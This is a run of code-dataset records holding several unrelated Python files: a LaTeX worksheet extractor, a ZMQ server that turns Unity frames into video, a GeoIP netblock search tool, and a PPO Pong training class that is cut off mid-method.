generate_file(file_name, file_paths, solution=False):\n\tfile = []\n\tfor file_path in file_paths:\n\t\twith open(file_path, 'r') as f:\n\t\t\tstart = False\n\t\t\tstart_sol = False\n\t\t\tfor line in f.read().split('\\n'):\n\t\t\t\tif line.startswith(r'\\begin{solution}'):\n\t\t\t\t\tstart_sol = True\n\t\t\t\tif line == r'\\begin{lstlisting}':\n\t\t\t\t\tstart = True\n\t\t\t\telif line == r'\\end{lstlisting}':\n\t\t\t\t\tstart = False\n\t\t\t\telif start and (start_sol == solution):\n\t\t\t\t\tfile.append(line)\n\t\tfile.append(\"\\n\")\n\twith open(file_name, 'w') as f:\n\t\tf.write('\\n'.join(file) + '\\n')\n\t\t\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\t# parser.add_argument('-o', '--out_file', type=str,\n\t# help='output file')\n\tparser.add_argument('-f','--input_file', type=str, help='input file e.g. mentor05.tex')\n\tparser.add_argument('-s', \"--solution\", action=\"store_true\", help=\"Create Solution files too\")\n\targs = parser.parse_args()\n\tfile_paths = get_dependencies(os.path.join(worksheet_source, args.input_file))\n\tfile_paths = [p for p in file_paths if '/text/' not in p]\n\tout_file = args.input_file.replace('.tex', '.py')\n\tgenerate_file(os.path.join(worksheet_source, out_file), file_paths)\n\tif args.solution:\n\t\tsol_name = out_file.replace('.py', '_sol.py')\n\t\tgenerate_file(os.path.join(worksheet_source, sol_name), file_paths, solution=True)\n","sub_path":"scripts/latex_to_py.py","file_name":"latex_to_py.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"574375744","text":"# Hello World server in Python\n# Binds REP socket to tcp://*:5555\n\n#import time\nimport zmq\nimport numpy as np\n#from PIL import Image\n#import struct\nimport cv2\nimport inverse_perspective as ip\n\nDIMENSION = 512\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\nprint(\"Listening\")\n\nVID_FPS = 20\nVID_SECONDS = 20\nimages_to_save = VID_FPS*VID_SECONDS\nimgNum = 0\nimages = []\nwhile imgNum < images_to_save:\n # Wait for next request from client\n message = socket.recv()\n #message will be a 2D array of 4 element vectors (ABGR or ARGB format) that has been flattened\n\n\n###OLD CODE START\n #img_bytes = np.array(message)\n #int_message = np.zeros((DIMENSION, DIMENSION, 3), dtype=np.uint8)\n\n #We need to reshape the array from a 1D array into a 3D array of colour vectors\n #We also want to drop the alpha value as it is redundant information\n #The 1D array consists of the colour vector as 4 individual byte elements\n #So we need to reshape the array AND drop the first element of each colour \n# for x in range(0,DIMENSION):\n# for y in range(0,DIMENSION):\n# i = 4*(y*DIMENSION + x) #Index of Alpha value - ABGR or ARGB format\n# arr = np.array( [ message[i+2], message[i+1], message[i] ] )\n# int_message[DIMENSION-1-y,x] = arr\n###OLD CODE END\n\n #Force message to byte array and cast as np array\n img_bytes = np.array(bytearray(message))\n #reshape from 1D to 3D array, x, y and colour\n arr2 = np.reshape(img_bytes, (DIMENSION, DIMENSION, 4))\n #Vertical part of image needs to be flipped (differing coord systems)\n int_message = np.flip(arr2[:, :, :-1], 0)\n #Also set the data to RGB format (instead of BGR)\n img = np.flip(int_message, 2)\n \n images.append(img)\n imgNum += 1\n print(\"imgNum = \" + str(imgNum))\n\n if imgNum < images_to_save:\n socket.send(b\"Ack\")\n else:\n #socket.send_string(\"END\")\n print(img)\n socket.send(b\"END\")\n break\n\nprint(\"DONE\")\n\nDIMS = (images[0].shape[0], images[0].shape[1])\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\n#fourcc = cv2.VideoWriter_fourcc('M','J','P','G')\nvid_path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/Output/Videos/unity_output.avi'\nout = cv2.VideoWriter(vid_path, \n fourcc, VID_FPS, DIMS, True)\n\nfolder_path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/'\n\nfor i in range(0, imgNum):\n path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/Output/Images/'\n num = str(i)\n if i < 10:\n num = \"00\" + str(i)\n elif i < 100:\n num = \"0\" + str(i)\n name = path + 'img_' + num + '.png'\n #images[i].save(name)\n print(\"saving \" + name)\n\n vid_frame = images[i]\n\n # if i < imgNum / 2:\n # vid_frame = images[i]\n # else:\n # edges = cv2.Canny(images[i], 150, 180)\n # edges = cv2.cvtColor(edges, cv2.COLOR_GRAY2RGB)\n # vid_frame = edges\n\n cv2.imwrite(name, vid_frame)\n out.write(vid_frame)\n\nout.release()\nprint(\"end\")\n","sub_path":"Simulation/PythonCode/PythonZMQServer.py","file_name":"PythonZMQServer.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"98935691","text":"#!/usr/bin/python3\nimport csv\nimport sqlite3\nimport argparse\nimport sys,os\nimport itertools\nfrom shutil import copyfile\n\n__version__ = '2.0.1'\nGEOIP_DB = os.path.join( os.path.dirname(__file__), 'geoip.db' )\n\ntry:\n\tdb = sqlite3.connect(GEOIP_DB)\nexcept:\n\tprint(\"permission denied to open %s\" % GEOIP_DB)\n\texit()\n\ndb.text_factory = str\nsql = db.cursor()\n\nitems = ['network']\nsquares = []\ncircles = []\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"-update\", dest='update', nargs='?', const='', help='update local database from remote ZIP-archive')\narg_parser.add_argument(\"-info\", dest='info', action=\"store_true\", help='show total amount netblocks')\n\narg_parser.add_argument('-ip', dest=\"ipaddr\", action=\"append\", help='search network by IP')\narg_parser.add_argument('-network', dest=\"network\", action=\"append\", help='search network by CIDR (parent)')\narg_parser.add_argument('-networks', dest=\"networks\", action=\"append\", help='search networks by CIDR (nested)')\narg_parser.add_argument('-asn', dest=\"asn\", action=\"append\", help='search network by ASN')\narg_parser.add_argument('-org', dest=\"org\", action=\"append\", help='search networks by ASN organization')\narg_parser.add_argument('-city', dest=\"city\", action=\"append\", help='search networks in city')\narg_parser.add_argument('-country', dest=\"country\", action=\"append\", help='search networks in country')\narg_parser.add_argument('-continent', dest=\"continent\", action=\"append\", help='search networks on the continent')\narg_parser.add_argument('-square', dest=\"lat_long_lat_long\", action=\"append\", help='search networks in square area (lat,long,lat,long)')\narg_parser.add_argument('-circle', dest=\"lat_long_km\", action=\"append\", help='search networks in circle area (lat,long,km)')\n\narg_parser.add_argument(\"-resolve-rwhois\", dest=\"resolve_ripe\", action=\"store_true\", help=\"rwhois db resolve netname (faster)\")\narg_parser.add_argument(\"-resolve-whois\", dest=\"resolve_whois\", action=\"store_true\", help=\"whois resolve netname (slower)\")\n\narg_parser.add_argument(\"-kml\", dest=\"save_to_kml\", help=\"save coordinates of netblocks as KML\")\narg_parser.add_argument(\"-html\", dest=\"save_to_html\", help=\"save coordinates of netblocks as HTML\")\narg_parser.add_argument(\"-version\", dest=\"version\", action=\"store_true\", help=\"show version\")\n\narg_parser.add_argument(\"items\", nargs='*', default=['network', 'continent', 'country', 'city', 'lat', 'long'], help=\"one or more: network,asn,org,continent,country,city,lat,long\")\n\ndef check_db():\n\ttry:\n\t\tsql.execute(\"select 1 from geoip limit 1\")\n\t\treturn True\n\texcept:\n\t\treturn False\n\ndef show_db_info():\n\tcount, = sql.execute('SELECT COUNT(network) FROM geoip')\n\tprint(count[0])\n\ndef cidr_to_min_max(cidr):\n\tif len( cidr.split('/') ) == 2:\n\t\tip_begin,mask = cidr.split('/')\n\telse:\n\t\tip_begin = cidr\n\t\tmask = 32\n\ta,b,c,d = ip_begin.split('.')\n\tmask = 2**(32-int(mask)) -1\n\t_min = ( (int(a)<<24) + (int(b)<<16) + (int(c)<<8) + int(d) ) & ~mask\n\t_max = _min + mask\n\treturn _min,_max\n\ndef update(tmpfile, url=None):\n\timport urllib.request\n\tfrom zipfile import ZipFile\n\tfrom io import StringIO\n\n\tDB_ASN = \"http://web.archive.org/web/20191227183143/https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip\"\n\tDB_COUNTRY = \"http://web.archive.org/web/20191227183011/https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip\"\n\tDB_CITY = \"http://web.archive.org/web/20191227182816if_/https://geolite.maxmind.com/download/geoip/database/GeoLite2-City-CSV.zip\"\n\n\tdef download(uri,target):\n\t\tprint(uri)\n\t\tresp = urllib.request.urlopen(uri)\n\t\tsize = int( resp.headers.get('content-length') or resp.headers.get('x-archive-orig-content-length') or 0 )\n\t\tdownloaded = 0\n\t\twhile True:\n\t\t\tdata = resp.read(4096)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\ttarget.write(data)\n\t\t\tdownloaded += len(data)\n\t\t\tif size:\n\t\t\t\tdone = int(50 * downloaded / size)\n\t\t\t\tsys.stdout.write( \"\\r[%s%s] %d/%d bytes\" % ( '=' * done, ' ' * (50-done), downloaded, size ) )\n\t\t\telse:\n\t\t\t\tsys.stdout.write( \"\\r%d bytes\" % downloaded )\n\t\t\tsys.stdout.flush()\n\n\tif url and os.path.isfile(url):\n\t\tcopyfile(url, tmpfile.name)\n\telse:\n\t\tdownload(uri=url or DB_CITY, target=tmpfile)\n\tprint( '\\nunpacking...' )\n\tz = ZipFile( tmpfile )\n\tlang = input(\"select language (ja/zh-CN/fr/ru/en/pt-BR/de/es): \")\n\tdb_blocks = ''\n\tdb_locations = ''\n\tfor compressed_filepath in z.namelist():\n\t\tif compressed_filepath.find('GeoLite2-City-Blocks-IPv4.csv') != -1:\n\t\t\tdb_blocks = z.read(compressed_filepath).decode()\n\t\telif compressed_filepath.find('GeoLite2-City-Locations-%s.csv' % lang) != -1:\n\t\t\tdb_locations = z.read(compressed_filepath).decode()\n\tif not db_blocks:\n\t\tprint( \"'GeoLite2-City-Blocks-IPv4.csv' not found in %s\" % DB_CITY )\n\t\treturn False\n\telif not db_locations:\n\t\tprint( \"'GeoLite2-City-Locations-%s.csv' not found in %s\" % (lang,DB_CITY) )\n\t\treturn False\n\tz.close()\n\n\tprint( 'importing...' )\n\tsql.execute(\"DROP TABLE IF EXISTS geoip\")\n\tsql.execute(\"CREATE TABLE geoip(ip_begin INT, ip_end INT, network TEXT, asn TEXT, org TEXT, continent TEXT, country TEXT, city TEXT, lat FLOAT, long FLOAT)\")\n\tlocations = {}\n\t\n\tfor location in csv.DictReader(StringIO(db_locations)):\n\t\tlocations.update( { \n\t\t\tlocation['geoname_id'] : {\n\t\t\t\t'continent': location['continent_name'].lower(),\n\t\t\t\t'country': location['country_name'].lower(),\n\t\t\t\t'city': location['city_name'].lower()\n\t\t\t}\n\t\t} )\n\n\tn = 0\n\tfor block in csv.DictReader(StringIO(db_blocks)):\n\t\tlocation = locations.get( block['geoname_id'] )\n\t\tif location:\n\t\t\tcontinent = location['continent']\n\t\t\tcountry = location['country']\n\t\t\tcity = location['city']\n\t\telse:\n\t\t\tcontinent = country = city = ''\n\t\t#net = netaddr.IPNetwork( block['network'] ) slow!!!\n\t\tnet = cidr_to_min_max( block['network'] )\n\t\tsql.execute(\n\t\t\t\"INSERT INTO geoip(ip_begin,ip_end,network,continent,country,city,lat,long) VALUES(?,?,?,?,?,?,?,?)\",\n\t\t\t( str(min(net)), str(max(net)), block['network'], continent, country, city, block['latitude'], block['longitude'] )\n\t\t)\n\t\tif n % 25000 == 0:\n\t\t\tsys.stdout.write(\"\\r%d networks\" % n)\n\t\t\tsys.stdout.flush()\n\t\tn += 1\n\tsql.execute(\"CREATE INDEX ip_begin_index ON geoip(ip_begin)\")\n\tsql.execute(\"CREATE INDEX ip_end_index on geoip(ip_end)\")\n\tsql.execute(\"CREATE INDEX network_index ON geoip(network)\")\n\tdb.commit()\n\tsys.stdout.write(\"\\r%d networks\\n\" % n)\n\tsys.stdout.flush()\n\n\ttry:\n\t\ttmpfile.truncate()\n\t\tdownload(uri=DB_ASN, target=tmpfile)\n\t\tprint( '\\nunpacking...' )\n\t\tz = ZipFile( tmpfile )\n\t\tdb_asn = ''\n\t\tfor compressed_filepath in z.namelist():\n\t\t\tif compressed_filepath.find('GeoLite2-ASN-Blocks-IPv4.csv') != -1:\n\t\t\t\tdb_asn = z.read(compressed_filepath)\n\t\tif not db_asn:\n\t\t\tprint( \"'GeoLite2-ASN-Blocks-IPv4.csv' not found in %s\" % DB_ASN )\n\t\t\treturn False\n\t\tprint( 'importing...' )\n\t\tn = 1\n\t\tfor asn in csv.DictReader( BytesIO(db_asn) ):\n\t\t\tnet = asn['network']\n\t\t\tnum = asn['autonomous_system_number']\n\t\t\torg = asn['autonomous_system_organization']\n\t\t\tsql.execute( \"UPDATE geoip SET asn=?, org=? WHERE network = ?\", (num,org,net) )\n\t\t\tif n % 25000 == 0:\n\t\t\t\tsys.stdout.write(\"\\r%d ASNs\" % n)\n\t\t\t\tsys.stdout.flush()\n\t\t\tn += 1\n\texcept Exception as e:\n\t\tprint(str(e))\n\n\tdb.commit()\n\tsys.stdout.write(\"\\r%d ASNs\\n\" % n)\n\tsys.stdout.flush()\n\t\n\ndef do_search(items, params):\n\tglobal squares, circles\n\tstatement = []\n\targs = []\n\tdef _sign(l):\n\t\tl = l.upper()\n\t\tfor piece,sign in list({'N':1, 'S':-1, 'E': 1, 'W': -1}.items()):\n\t\t\tif l.find(piece) != -1:\n\t\t\t\treturn float( l.replace(piece,'') ) * sign\n\t\treturn float(l)\n\tdef _check_square(from_latitude,from_longitude,to_latitude,to_longitude):\n\t\tif from_latitude > to_latitude:\n\t\t\tfrom_latitude,to_latitude = to_latitude,from_latitude\n\t\tif from_longitude > to_longitude:\n\t\t\tfrom_longitude,to_longitude = to_longitude,from_longitude\n\t\treturn from_latitude,from_longitude,to_latitude,to_longitude\n\n\tfor attr,val in list(params.items()):\n\t\tif attr == 'square':\n\t\t\t(from_latitude,from_longitude,to_latitude,to_longitude) = _check_square( *list(map( _sign, val.split(',') ) ))\n\t\t\tstatement.append( \"(lat >= ? AND lat <= ? AND long >= ? AND long <= ?)\" )\n\t\t\targs.extend( [from_latitude, to_latitude, from_longitude, to_longitude] )\n\t\t\tsquares.append( [from_latitude, from_longitude, to_latitude, to_longitude] )\n\t\telif attr == 'circle':\n\t\t\tlat, lon, radius_km = val.split(',')\n\t\t\tlat, lon = list(map( _sign, [lat, lon] ))\n\t\t\tradius = float(radius_km) * ( 1.0 / 110.574 )\n\t\t\t#radius = float(radius_km) * ( 1.0 / ( 111.320*math.cos(lat) ) )\n\t\t\tstatement.append( \"( ( (lat - ?)*(lat - ?) + (long - ?)*(long - ?) ) < ? )\" )\n\t\t\targs.extend( [lat, lat, lon, lon, radius*radius] )\n\t\t\tcircles.append( [lat, lon, radius, float(radius_km)] )\n\t\telif attr == 'ipaddr':\n\t\t\tip, ip = cidr_to_min_max(val)\n\t\t\tstatement.append( \"(network = (SELECT network FROM geoip WHERE ? BETWEEN ip_begin AND ip_end ORDER BY ip_begin DESC LIMIT 1) )\" )\n\t\t\targs.append( ip )\n\t\telif attr == 'network':\n\t\t\t_min, _max = cidr_to_min_max( val )\n\t\t\tstatement.append( \"(network in (SELECT network FROM geoip WHERE ? BETWEEN ip_begin AND ip_end AND ? BETWEEN ip_begin AND ip_end ORDER BY ip_begin DESC LIMIT 1) )\" )\n\t\t\targs.extend( [_min, _max] )\n\t\telif attr == 'networks':\n\t\t\t_min, _max = cidr_to_min_max( val )\n\t\t\tstatement.append( \"(network in (SELECT network FROM geoip WHERE ip_begin BETWEEN ? AND ? AND ip_end BETWEEN ? AND ?) )\" )\n\t\t\targs.extend( [_min, _max, _min, _max] )\n\t\telif attr.find('no_') != -1:\n\t\t\tstatement.append( \"(%s NOT LIKE ?)\" % attr[3:] )\n\t\t\targs.append( val )\n\t\telse:\n\t\t\tstatement.append( \"(%s LIKE ?)\" % attr )\n\t\t\targs.append( val )\n\n\tresults = []\n\tquery = ( \"SELECT %s FROM geoip WHERE \" % ','.join(items) ) + ' AND '.join(statement)\n\tfor result in sql.execute( query, args ):\n\t\tresults.append( dict( list(zip(items,result)) ) )\n\treturn results\n\ndef search(items, params):\n\tresults = []\n\tfor attrs in itertools.product( *list(params.values()) ):\n\t\tresults += do_search( items, dict( list(zip(list(params.keys()), attrs)) ) )\n\treturn results\n\ndef geo_search(args):\n\tparams = {}\n\tfor attr,vals in list(args.items()):\n\t\tparams[attr] = []\n\t\tfor val in vals:\n\t\t\tif os.path.isfile(val):\n\t\t\t\tinfile = val\n\t\t\t\twith open(infile) as f:\n\t\t\t\t\tfor line in f:\n\t\t\t\t\t\tval = line.split('\\n')[0]\n\t\t\t\t\t\tparams[attr].append(val)\n\t\t\telif val == '-':\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tval = input()\n\t\t\t\t\t\tparams[attr].append(val)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tparams[attr].append(val)\n\treturn search(items, params)\n\ndef resolve_whois(netblocks):\n\tfrom ipwhois import IPWhois\n\tfor netblock in netblocks:\n\t\ttry:\n\t\t\tnetname = IPWhois( netblock['network'].split('/')[0] ).lookup_whois()['nets'][0]['name']\n\t\t\tnetblock['netname'] = netname[:20]+'..' if len(netname) > 20 else netname\n\t\texcept:\n\t\t\tpass\n\ndef resolve_ripe(netblocks):\n\timport rwhois\n\tfor netblock in netblocks:\n\t\tif netblock.get('network'):\n\t\t\tresults = rwhois.do_search( [\"netname\"], { \"inetnum\": netblock['network'] } )\n\t\t\tnetname = results[0]['netname'] if results and results[0].get('netname') else ''\n\t\t\tif netname:\n\t\t\t\tnetblock['netname'] = netname[:20]+'..' if len(netname) > 20 else netname\n\ndef save_kml(netblocks, outfile):\n\tfrom pykml.factory import KML_ElementMaker as KML\n\tfrom lxml import etree\n\timport math\n\n\tdef kml(name, lat,lon):\n\t\treturn KML.Placemark( \n\t\t\tKML.name(name),\n\t\t\tKML.Point( \n\t\t\t\tKML.coordinates( \"%(long).04f,%(lat).04f\" % { 'lat': lat, 'long': lon } )\n\t\t\t\t) \n\t\t\t) \n\n\tdef draw_square(from_latitude, from_longitude, to_latitude, to_longitude):\n\t\treturn KML.Placemark(\n\t\t\tKML.name('square'),\n\t\t\tKML.Style(\n\t\t\t\tKML.LineStyle(\n\t\t\t\t\tKML.color('ff0000ff'),\n\t\t\t\t\tKML.width(2)\n\t\t\t\t)\n\t\t\t),\n\t\t\tKML.LineString(\n\t\t\t\tKML.coordinates(\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,from_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (to_longitude,from_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (to_longitude,to_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,to_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,from_latitude)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\tdef draw_circle(latitude, longitude, radius):\n\t\tn = 100\n\t\treturn KML.Placemark(\n\t\t\tKML.name('circle'),\n\t\t\tKML.Style(\n\t\t\t\tKML.LineStyle(\n\t\t\t\t\tKML.color('ff0000ff'),\n\t\t\t\t\tKML.width(2)\n\t\t\t\t)\n\t\t\t),\n\t\t\tKML.LineString(\n\t\t\t\tKML.coordinates(\n\t\t\t\t\t' '.join( map( lambda xy:'%.04f,%.04f,0.0 '%(xy[0],xy[1]), \n\t\t\t\t\t\t\t[ ( longitude+math.cos(2*math.pi/n*x)*radius, latitude+math.sin(2*math.pi/n*x)*radius ) for x in range(0,n+1) ]\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\tpoints = {}\n\tplaces = []\n\tfor netblock in netblocks:\n\t\tlat,lon,network,netname = netblock.get('lat'), netblock.get('long'), netblock.get('network'), netblock.get('netname','')\n\t\tif lat and lon:\n\t\t\tpoint = \"%s/%s\" % (lat, lon)\n\t\t\tif points.get(point):\n\t\t\t\tpoints[point].append( ' '.join( [network,netname] ) )\n\t\t\telse:\n\t\t\t\tpoints[point] = [network]\n\tfor point in list(points.keys()):\n\t\tlat,lon = list(map( float, point.split(\"/\") ))\n\t\tplaces.append( kml( \"\\n\".join( points[point] ), lat, lon ) )\n\tfor square in squares:\n\t\tplaces.append( draw_square( *list(map( float, square ) ) ))\n\tfor circle in circles:\n\t\tplaces.append( draw_circle( *list(map( float, circle[:3] ) ) ))\n\t\n\twith open(outfile, \"wb\") as o:\n\t\to.write( etree.tostring( KML.Folder( *tuple(places) ) ) )\n\ndef html_escape(text):\n\treturn text.replace(\"`\", \"'\").replace(\"'\", \"'\").replace('\"', \""\")\n\ndef save_html(netblocks, items, outfile):\n\timport folium\n\tfolium_map = folium.Map(location=[ netblocks[0].get('lat'), netblocks[0].get('long') ], zoom_start=10, tiles=\"CartoDB dark_matter\")\n\n\tcoordinates = {}\n\tfor netblock in netblocks:\n\t\tabout_netblock = ' | '.join( [str( netblock.get(i) or '' ) for i in items] )\n\t\tif netblock.get('lat') and netblock.get('long'):\n\t\t\tif \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) in list(coordinates.keys()):\n\t\t\t\tcoordinates[ \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) ] += \"
\" + html_escape(about_netblock)\n\t\t\telse:\n\t\t\t\tcoordinates[ \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) ] = html_escape(about_netblock)\n\t\t\n\tfor lat_long,networks in list(coordinates.items()):\n\t\tfolium.CircleMarker(location=list(map(float, lat_long.split(','))), popup=networks, radius=1).add_to(folium_map)\n\n\tfor circle in circles:\n\t\tfolium.Circle(location=list(map(float, circle[:2])), radius=circle[3]*1000, color=\"red\").add_to(folium_map)\n\n\tfor square in squares:\n\t\tprint( list(map(float, square)) )\n\t\tfrom_latitude, from_longitude, to_latitude, to_longitude = list(map(float, square))\n\t\tlocations = [ (from_latitude,from_longitude) ]\n\t\tlocations.append( (from_latitude,to_longitude) )\n\t\tlocations.append( (to_latitude,to_longitude) )\n\t\tlocations.append( (to_latitude,from_longitude) )\n\t\tlocations.append( (from_latitude,from_longitude) )\n\t\tfolium.PolyLine(locations, weight=1, color=\"red\").add_to(folium_map)\n\n\tfolium_map.save(outfile)\n\n\ndef get_stat(netblocks, items):\n\tstatistics = {}\n\tips = 0\n\tfor item in items:\n\t\tif item == 'network':\n\t\t\tfor network in [n.get('network') for n in netblocks]:\n\t\t\t\t_min,_max = cidr_to_min_max(network)\n\t\t\t\tips += _max - _min\n\t\t\tstatistics[item] = '%d ip' % ips\n\t\telse:\n\t\t\tvals = set()\n\t\t\tfor val in [str(n.get(item)) or '' for n in netblocks]:\n\t\t\t\tvals.add(val)\n\t\t\tstatistics[item] = '%d %s' % ( len(vals), item )\n\treturn statistics\n\ndef print_row( values, margins ):\n\trow = []\n\tfor i in range( len(values) ):\n\t\trow.append( values[i] + \" \" * ( margins[i] - len( values[i]) ) )\n\tprint(' | '.join(row))\n\n\ndef main( argv=['-h'] ):\n\tglobal items\n\targs = arg_parser.parse_args(argv)\n\n\titems = args.items\n\tnetblocks = []\n\n\tif args.version:\n\t\tprint(__version__)\n\telif args.update != None:\n\t\tfrom tempfile import NamedTemporaryFile\n\t\ttmpfile = NamedTemporaryFile()\n\t\ttry:\n\t\t\tif args.update:\n\t\t\t\tupdate(tmpfile, url=args.update)\n\t\t\telse:\n\t\t\t\tupdate(tmpfile)\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\ttmpfile.close()\n\telif args.info:\n\t\tshow_db_info()\n\telse:\n\t\tparams = {}\n\t\tif args.ipaddr:\n\t\t\tparams['ipaddr'] = args.ipaddr\n\t\tif args.network:\n\t\t\tparams['network'] = args.network\n\t\tif args.networks:\n\t\t\tparams['networks'] = args.networks\n\t\tif args.asn:\n\t\t\tparams['asn'] = args.asn\n\t\tif args.org:\n\t\t\tparams['org'] = args.org\n\t\tif args.city:\n\t\t\tparams['city'] = args.city\n\t\tif args.country:\n\t\t\tparams['country'] = args.country\n\t\tif args.continent:\n\t\t\tparams['continent'] = args.continent\n\t\tif args.lat_long_lat_long:\n\t\t\tparams['square'] = args.lat_long_lat_long\n\t\tif args.lat_long_km:\n\t\t\tparams['circle'] = args.lat_long_km\n\n\t\tif args.save_to_html:\n\t\t\tif not 'lat' in items:\n\t\t\t\titems.append('lat')\n\t\t\tif not 'long' in items:\n\t\t\t\titems.append('long')\n\n\t\tif params:\n\t\t\tif check_db():\n\t\t\t\tnetblocks = geo_search( params )\n\t\t\telse:\n\t\t\t\tprint( \"update database first\" )\n\t\t\t\treturn\n\n\tif args.resolve_ripe:\n\t\tresolve_ripe( netblocks )\n\t\titems.insert(1, \"netname\")\n\telif args.resolve_whois:\n\t\tresolve_whois( netblocks )\n\t\titems.insert(1, \"netname\")\n\n\tif netblocks and args.save_to_kml:\n\t\tsave_kml(netblocks, args.save_to_kml)\n\telif netblocks and args.save_to_html:\n\t\titems.remove('lat')\n\t\titems.remove('long')\n\t\tsave_html(netblocks, items, args.save_to_html)\n\telif netblocks:\n\t\tsummary = get_stat(netblocks, items)\n\t\tmargins = [max( [len(str(n.get(i) or '')) for n in netblocks] + [len(i), len(summary[i])] ) for i in items]\n\t\tif len(items) > 1:\n\t\t\tprint_row(tuple(items), margins )\n\t\t\tprint_row(tuple( ['-'*m for m in margins] ), margins )\n\t\t\tfor netblock in netblocks:\n\t\t\t\tprint_row([str( netblock.get(i) or '' ) for i in items], margins )\n\t\t\tprint_row(tuple( ['-'*m for m in margins] ), margins )\n\t\t\tprint_row(tuple( [str( summary.get(i) or '' ) for i in items] ), margins )\n\n\t\telse:\n\t\t\tfor netblock in netblocks:\n\t\t\t\tprint_row([str( netblock.get(i) or '' ) for i in items], [0] )\n\n\tif db:\n\t\tdb.close()\n\nif __name__ == '__main__':\n\tmain( sys.argv[1:] )\n","sub_path":"georipe/geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":17643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"155909925","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom tqdm import tqdm\nimport torch.optim as optim\nfrom parallelEnv import parallelEnv\nimport pong_utils\n\nclass PPO:\n def __init__(self, envs):\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.policy = Policy().to(self.device)\n self.envs = envs\n\n def clipped_surrogate(self, old_probs, states, actions, rewards,\n discount=0.995, epsilon=0.1, beta=0.01):\n discount = discount ** np.arange(len(rewards))\n rewards = np.asarray(rewards) * discount[:, np.newaxis]\n\n # convert rewards to future rewards\n rewards_future = rewards[::-1].cumsum(axis=0)[::-1]\n\n mean = np.mean(rewards_future, axis=1)\n std = np.std(rewards_future, axis=1) + 1.0e-10\n\n rewards_normalized = (rewards_future - mean[:, np.newaxis]) / std[:, np.newaxis]\n\n # convert everything into pytorch tensors and move to gpu if available\n actions = torch.tensor(actions, dtype=torch.int8, device=self.device)\n old_probs = torch.tensor(old_probs, dtype=torch.float, device=self.device)\n rewards = torch.tensor(rewards_normalized, dtype=torch.float, device=self.device)\n\n # convert states to policy (or probability)\n new_probs = self.states_to_prob(states)\n new_probs = torch.where(actions == pong_utils.RIGHT, new_probs, 1.0 - new_probs)\n\n # ratio for clipping\n ratio = new_probs / old_probs\n\n # clipped function\n clip = torch.clamp(ratio, 1 - epsilon, 1 + epsilon)\n clipped_surrogate = torch.min(ratio * rewards, clip * rewards)\n\n # include a regularization term\n # this steers new_policy towards 0.5\n # add in 1.e-10 to avoid log(0) which gives nan\n entropy = -(new_probs * torch.log(old_probs + 1.e-10) + \\\n (1.0 - new_probs) * torch.log(1.0 - old_probs + 1.e-10))\n\n # this returns an average of all the entries of the tensor\n # effective computing L_sur^clip / T\n # averaged over time-step and number of trajectories\n # this is desirable because we have normalized our rewards\n return torch.mean(clipped_surrogate + beta * entropy)\n\n\n def train(self, episode=800, discount_rate = 0.99, epsilon = 0.1, beta=0.01,\n tmax = 320, SGD_epoch = 4, lr=1e-4):\n self.optimizer = optim.Adam(self.policy.parameters(), lr=lr)\n # keep track of progress\n mean_rewards = []\n\n for e in tqdm(range(episode)):\n # collect trajectories\n old_probs, states, actions, rewards = \\\n self.collect_trajectories(tmax=tmax)\n\n total_rewards = np.sum(rewards, axis=0)\n\n # gradient ascent step\n for _ in range(SGD_epoch):\n # uncomment to utilize your own clipped function!\n # L = -clipped_surrogate(policy, old_probs, states, actions, rewards, epsilon=epsilon, beta=beta)\n\n L = -self.clipped_surrogate(old_probs, states, actions, rewards,\n epsilon=epsilon, beta=beta)\n self.optimizer.zero_grad()\n L.backward()\n self.optimizer.step()\n del L\n\n # the clipping parameter reduces as time goes on\n epsilon *= .999\n\n # the regulation term also reduces\n # this reduces exploration in later runs\n beta *= .995\n\n # get the average reward of the parallel environments\n mean_rewards.append(np.mean(total_rewards))\n\n # display some progress every 20 iterations\n if (e + 1) % 20 == 0:\n print(\"Episode: {0:d}, score: {1:f}\".format(e + 1, np.mean(total_rewards)))\n print(total_rewards)\n\n\n def states_to_prob(self, states):\n states = torch.stack(states)\n policy_input = states.view(-1, *states.shape[-3:])\n return self.policy(policy_input).view(states.shape[:-3])\n\n # collect trajectories for a parallelized parallelEnv object\n def collect_trajectories(self, tmax=200, nrand=5):\n\n # number of parallel instances\n n = len(self.envs.ps)\n\n # initialize returning lists and start the game!\n state_list = []\n reward_list = []\n prob_list = []\n action_list = []\n\n self.envs.reset()\n\n # start all parallel agents\n 